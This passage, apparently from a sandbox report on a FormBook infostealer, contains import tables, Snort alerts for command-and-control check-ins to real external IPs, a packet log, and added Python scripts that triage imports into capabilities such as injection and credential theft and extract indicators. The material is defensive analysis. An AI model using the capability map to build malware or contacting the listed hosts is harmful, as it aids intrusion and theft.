GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA |
| USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW |
| GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath |
| COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW |
| ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW |
| SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
| ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity |
| OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit |
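An import table this wide reads like a capability list: process injection primitives (OpenProcess, VirtualAllocEx, WriteProcessMemory), process enumeration (CreateToolhelp32Snapshot, Process32NextW), input capture and lockout (GetAsyncKeyState, BlockInput, SendInput), clipboard access, token manipulation (AdjustTokenPrivileges, DuplicateTokenEx, CreateProcessAsUserW), registry writes, WinINet and raw socket networking, and even machine shutdown. The caveat that matters here is the "Binary is likely a compiled AutoIt script file" verdict: these are the imports of the AutoIt3 interpreter that wraps the script, so they describe what the runtime can do on the script's behalf, not what this script does. The dynamic signatures (foreign-memory writes, APC queuing, browser and mail credential access, FormBook Yara hits) are the evidence for what actually happened. The Python below is an added example, not part of the Joe Sandbox report, that parses rows in the form shown above and buckets the imports by capability so the static view can be compared with those dynamic findings; the bucket names and the import-to-bucket mapping are my own triage table, not a Joe Sandbox signature set, and the sample rows are a transcribed subset of the table above.

```python
import re
from collections import defaultdict

# Import-to-capability map. My own triage table, not a Joe Sandbox signature set;
# every name listed appears in the import table above.
CAPABILITIES = {
    "process-injection": {"OpenProcess", "VirtualAllocEx", "WriteProcessMemory",
                          "ReadProcessMemory", "VirtualFreeEx", "CreateProcessW",
                          "ResumeThread"},
    "process-discovery": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW",
                          "EnumWindows", "GetWindowThreadProcessId", "FindWindowW"},
    "anti-debug":        {"IsDebuggerPresent", "OutputDebugStringW",
                          "QueryPerformanceCounter", "QueryPerformanceFrequency"},
    "input-capture":     {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState",
                          "BlockInput", "SendInput", "keybd_event", "mouse_event"},
    "clipboard":         {"OpenClipboard", "GetClipboardData", "SetClipboardData"},
    "token-abuse":       {"AdjustTokenPrivileges", "LookupPrivilegeValueW", "DuplicateTokenEx",
                          "CreateProcessAsUserW", "CreateProcessWithLogonW", "LogonUserW"},
    "registry-write":    {"RegSetValueExW", "RegCreateKeyExW", "RegDeleteValueW",
                          "RegDeleteKeyW"},
    "http-client":       {"InternetOpenW", "HttpOpenRequestW", "HttpSendRequestW",
                          "InternetReadFile", "InternetOpenUrlW", "FtpOpenFileW"},
    "raw-sockets":       {"socket", "connect", "send", "recv", "gethostbyname",
                          "listen", "accept"},
    "system-control":    {"ExitWindowsEx", "InitiateSystemShutdownExW",
                          "SetSystemPowerState", "SHEmptyRecycleBinW"},
}

# Matches both the flattened report row ("KERNEL32.dllSleep, ...") and a
# pipe-delimited row ("| KERNEL32.dll | Sleep, ... |").
_ROW = re.compile(r"^\|?\s*([\w.-]+?\.dll)\s*\|?\s*(.*?)\s*\|?\s*$", re.IGNORECASE)


def parse_import_rows(text: str) -> dict:
    """Return {dll: [function, ...]} for every row that names a DLL."""
    imports = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if not m or not m.group(2):
            continue  # header rows ("DLLImport") and blank lines carry no .dll
        dll, funcs = m.group(1), m.group(2)
        imports[dll] = [f.strip() for f in funcs.split(",") if f.strip()]
    return imports


def triage(imports: dict) -> dict:
    """Map imported functions to capability buckets: {bucket: ['DLL!Func', ...]}."""
    hits = defaultdict(list)
    for dll, funcs in imports.items():
        for func in funcs:
            for bucket, names in CAPABILITIES.items():
                if func in names:
                    hits[bucket].append(f"{dll}!{func}")
    return {b: sorted(v) for b, v in sorted(hits.items())}


# Constructed input: a subset of rows transcribed from the import table above, in the
# flattened form the report extraction produced (the KERNEL32/USER32/ADVAPI32 rows
# are shortened to the functions of interest).
SAMPLE_ROWS = """\
DLLImport
WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
KERNEL32.dllOpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, IsDebuggerPresent, OutputDebugStringW, CreateProcessW, ResumeThread
USER32.dllGetAsyncKeyState, GetKeyboardState, BlockInput, SendInput, OpenClipboard, GetClipboardData, ExitWindowsEx, FindWindowW
ADVAPI32.dllRegSetValueExW, RegCreateKeyExW, AdjustTokenPrivileges, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, LogonUserW, InitiateSystemShutdownExW
"""

if __name__ == "__main__":
    for bucket, funcs in triage(parse_import_rows(SAMPLE_ROWS)).items():
        print(f"{bucket:18} {len(funcs):2}  {', '.join(funcs)}")
```

Use the bucket list as a checklist against the behaviour section rather than as a verdict on its own: for an AutoIt-wrapped sample every bucket will light up for every script, and the interesting question is which of them the dynamic trace confirms (here: injection into a foreign process and credential harvesting) and which it does not.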
| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | Great Britain | |
| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 07/04/24-03:12:38.577180 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49761 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:12:35.806170 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49758 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:13:29.265779 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49771 | 80 | 192.168.2.4 | 162.241.253.174 |
| 07/04/24-03:13:47.726029 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49775 | 80 | 192.168.2.4 | 35.190.52.58 |
| 07/04/24-03:11:49.918725 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49749 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:11:30.935623 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49743 | 80 | 192.168.2.4 | 207.148.37.252 |
| 07/04/24-03:13:25.838396 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49769 | 80 | 192.168.2.4 | 38.47.232.224 |
| 07/04/24-03:11:42.301664 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:10:37.155346 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:12:43.659425 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49763 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:13:12.602462 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49765 | 80 | 192.168.2.4 | 13.248.169.48 |
| 07/04/24-03:12:24.376986 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49753 | 80 | 192.168.2.4 | 203.161.55.102 |
| 07/04/24-03:10:44.897966 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49740 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:13:52.790653 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49779 | 80 | 192.168.2.4 | 35.190.52.58 |
| 07/04/24-03:13:53.626059 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49780 | 80 | 192.168.2.4 | 202.95.21.152 |
| 07/04/24-03:11:28.369643 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| 07/04/24-03:13:45.175297 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49773 | 80 | 192.168.2.4 | 35.190.52.58 |
| 07/04/24-03:13:10.075816 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49764 | 80 | 192.168.2.4 | 13.248.169.48 |
| 07/04/24-03:12:16.585944 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.4 | 203.161.55.102 |
| 07/04/24-03:13:30.898164 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49772 | 80 | 192.168.2.4 | 38.47.232.224 |
| 07/04/24-03:13:46.020455 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49774 | 80 | 192.168.2.4 | 202.95.21.152 |
| 07/04/24-03:13:17.664187 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49767 | 80 | 192.168.2.4 | 13.248.169.48 |
| 07/04/24-03:12:19.121759 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49751 | 80 | 192.168.2.4 | 203.161.55.102 |
| 07/04/24-03:10:20.795048 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| 07/04/24-03:11:44.836772 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49747 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:13:23.294796 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49768 | 80 | 192.168.2.4 | 38.47.232.224 |
| 07/04/24-03:11:36.007994 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49745 | 80 | 192.168.2.4 | 207.148.37.252 |
| 07/04/24-03:10:39.695122 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.4 | 116.213.43.190 |
| 07/04/24-03:13:48.555866 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49776 | 80 | 192.168.2.4 | 202.95.21.152 |
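Two ET PRO signatures fire throughout the run: 2855465 on the FormBook GET check-in and 2855464 on the POST check-in, each against a different destination every minute or so on a fresh ephemeral port. That pattern is FormBook working down its embedded server list rather than one host being beaconed repeatedly, so the useful view is per destination, in order of first contact. The Python below is an added example, not part of the Joe Sandbox report, that parses alert rows in the pipe-delimited form shown above, sorts them by timestamp (the table is not in time order), summarises GET and POST check-ins per destination and emits an ip:port indicator list. The sample rows are eight alerts transcribed from the table above; the `Alert` and `C2Summary` types and the helper names are mine.

```python
from collections import OrderedDict
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample: eight rows transcribed from the Snort alert table above, kept in
# the table's own (unsorted) order. Timestamps are Snort's MM/DD/YY-HH:MM:SS.usec.
ALERT_ROWS = """\
07/04/24-03:13:29.265779 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49771 | 80 | 192.168.2.4 | 162.241.253.174
07/04/24-03:10:37.155346 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49737 | 80 | 192.168.2.4 | 116.213.43.190
07/04/24-03:11:36.007994 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49745 | 80 | 192.168.2.4 | 207.148.37.252
07/04/24-03:10:44.897966 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49740 | 80 | 192.168.2.4 | 116.213.43.190
07/04/24-03:10:20.795048 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49736 | 80 | 192.168.2.4 | 165.154.0.120
07/04/24-03:11:28.369643 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49742 | 80 | 192.168.2.4 | 207.148.37.252
07/04/24-03:10:39.695122 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49738 | 80 | 192.168.2.4 | 116.213.43.190
07/04/24-03:12:16.585944 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.4 | 203.161.55.102
"""


@dataclass
class Alert:
    ts: datetime
    proto: str
    sid: int
    msg: str
    sport: int
    dport: int
    src: str
    dst: str


def parse_alerts(text: str) -> list:
    """Parse pipe-delimited alert rows and return them sorted by timestamp."""
    alerts = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith(("Timestamp", "|---")):
            continue  # header / separator rows
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 8:
            raise ValueError(f"unexpected column count: {line!r}")
        ts, proto, sid, msg, sport, dport, src, dst = cells
        alerts.append(Alert(datetime.strptime(ts, "%m/%d/%y-%H:%M:%S.%f"), proto,
                            int(sid), msg, int(sport), int(dport), src, dst))
    return sorted(alerts, key=lambda a: a.ts)


@dataclass
class C2Summary:
    first_seen: datetime
    get_checkins: int = 0
    post_checkins: int = 0
    ports: set = field(default_factory=set)


def summarize_c2(alerts: list) -> "OrderedDict[str, C2Summary]":
    """Group alerts by destination, preserving first-contact order, and count the
    GET (initial check-in) and POST (data upload) variants per host."""
    summary = OrderedDict()
    for a in alerts:
        s = summary.setdefault(a.dst, C2Summary(first_seen=a.ts))
        if "(GET)" in a.msg:
            s.get_checkins += 1
        elif "(POST)" in a.msg:
            s.post_checkins += 1
        s.ports.add(a.dport)
    return summary


def ioc_lines(summary: "OrderedDict[str, C2Summary]") -> list:
    """One 'ip:port' indicator per destination endpoint, in first-contact order."""
    return [f"{dst}:{port}" for dst, s in summary.items() for port in sorted(s.ports)]


if __name__ == "__main__":
    summary = summarize_c2(parse_alerts(ALERT_ROWS))
    for dst, s in summary.items():
        print(f"{s.first_seen:%H:%M:%S} {dst:16} GET={s.get_checkins} POST={s.post_checkins}")
    print("\n".join(ioc_lines(summary)))
```

Treat the resulting list as leads, not as a confirmed C2 set: the IPs are whatever the configured hostnames resolved to at analysis time, and FormBook configurations are known to mix the live server with decoy hosts, so the host that answers the POST with real tasking is the one to chase, and blocking belongs on the domain names and the URI pattern as much as on these addresses.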
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Jul 4, 2024 03:10:20.788136959 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:20.792928934 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:20.793035030 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:20.795047998 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:20.799813032 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.714555979 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.714987040 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.714996099 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.715085983 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:21.716105938 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.716114998 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.716156960 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:21.717240095 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:21.717283964 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:21.719261885 CEST | 49736 | 80 | 192.168.2.4 | 165.154.0.120 |
| Jul 4, 2024 03:10:21.723942041 CEST | 80 | 49736 | 165.154.0.120 | 192.168.2.4 |
| Jul 4, 2024 03:10:37.148261070 CEST | 49737 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:37.153318882 CEST | 80 | 49737 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:37.153419018 CEST | 49737 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:37.155345917 CEST | 49737 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:37.161106110 CEST | 80 | 49737 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:38.671027899 CEST | 49737 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:38.716851950 CEST | 80 | 49737 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:39.688195944 CEST | 49738 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:39.693016052 CEST | 80 | 49738 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:39.693165064 CEST | 49738 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:39.695122004 CEST | 49738 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:39.699912071 CEST | 80 | 49738 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:41.200614929 CEST | 49738 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:41.249944925 CEST | 80 | 49738 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.334420919 CEST | 49739 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:42.339262962 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.339345932 CEST | 49739 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:42.347687006 CEST | 49739 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:42.352523088 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352533102 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352585077 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352654934 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352706909 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352776051 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352788925 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352893114 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:42.352900982 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:43.872517109 CEST | 49739 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:43.920900106 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:44.891166925 CEST | 49740 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:44.895970106 CEST | 80 | 49740 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:44.896059036 CEST | 49740 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:44.897965908 CEST | 49740 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:10:44.902672052 CEST | 80 | 49740 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:58.516448021 CEST | 80 | 49737 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:10:58.516515017 CEST | 49737 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:11:01.096749067 CEST | 80 | 49738 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:11:01.096843958 CEST | 49738 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:11:03.735394955 CEST | 80 | 49739 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:11:03.735474110 CEST | 49739 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:11:06.269541979 CEST | 80 | 49740 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:11:06.269681931 CEST | 49740 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:11:06.274136066 CEST | 49740 | 80 | 192.168.2.4 | 116.213.43.190 |
| Jul 4, 2024 03:11:06.279232979 CEST | 80 | 49740 | 116.213.43.190 | 192.168.2.4 |
| Jul 4, 2024 03:11:28.360053062 CEST | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:28.365034103 CEST | 80 | 49742 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:28.365169048 CEST | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:28.369642973 CEST | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:28.374424934 CEST | 80 | 49742 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:29.378324986 CEST | 80 | 49742 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:29.378434896 CEST | 80 | 49742 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:29.378451109 CEST | 80 | 49742 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:29.378496885 CEST | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:29.378498077 CEST | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:29.872566938 CEST | 49742 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:30.914050102 CEST | 49743 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:30.919161081 CEST | 80 | 49743 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:30.919719934 CEST | 49743 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:30.935622931 CEST | 49743 | 80 | 192.168.2.4 | 207.148.37.252 |
| Jul 4, 2024 03:11:30.940538883 CEST | 80 | 49743 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:31.832192898 CEST | 80 | 49743 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:31.832299948 CEST | 80 | 49743 | 207.148.37.252 | 192.168.2.4 |
| Jul 4, 2024 03:11:31.832355022 CEST | 49743 | 80 | 192.168.2.4 | 207.148.37.252 |
